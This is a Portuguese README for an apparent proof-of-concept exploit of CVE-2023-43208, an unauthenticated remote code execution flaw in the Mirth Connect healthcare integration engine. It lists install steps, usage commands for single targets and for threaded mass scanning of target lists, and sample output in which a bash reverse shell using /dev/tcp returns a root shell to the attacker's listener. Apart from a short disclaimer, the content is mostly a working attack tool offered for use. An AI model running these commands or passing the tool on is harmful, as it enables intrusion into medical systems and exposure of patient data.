
Um exploit de PoC para CVE-2023-43208 - Mirth Connect Execução Remota de Código (RCE)
Exploit de Prova de Conceito para CVE-2023-43208, uma vulnerabilidade de Execução Remota de Código não autenticada em Mirth Connect versões anteriores a
4.4.1.
Mirth Connect é um motor de integração de saúde de código aberto amplamente implantado. Esta vulnerabilidade explora uma falha de desserialização Java através do endpoint /api/users usando um payload XML malicioso que encadeia gadgets do Apache Commons Collections para alcançar RCE não autenticado.
A versão melhorada substitui o listener original pwncat por um shell PTY interativo totalmente livre de dependências usando apenas builtins do Python (socket, select, tty, termios). O shell é automaticamente atualizado para um PTY completo na conexão.
| Software | Versões Vulneráveis | Versão Corrigida |
|---|---|---|
| Mirth Connect | < 4.4.1 | 4.4.1+ |
python3/python/script)stty rows/cols)pwncat — apenas stdlib para o listenergit clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt
requests
packaging
rich
alive-progress
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...
root@mirth:/#
Esta ferramenta é destinada apenas para testes de penetração autorizados e fins educacionais.
O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal.
Os autores não são responsáveis por qualquer uso indevido ou danos causados por esta ferramenta.
| Flag | Descrição |
|---|
-u, --url | URL do alvo |
-lh, --lhost | Seu IP de escuta |
-lp, --lport | Sua porta de escuta |
-bp, --bindport | Substituição de porta de bind (útil com ngrok) |
-f, --file | Arquivo contendo lista de URLs alvo |
-o, --output | Salvar alvos vulneráveis em arquivo |
-t, --threads | Número de threads para varredura (padrão: 50) |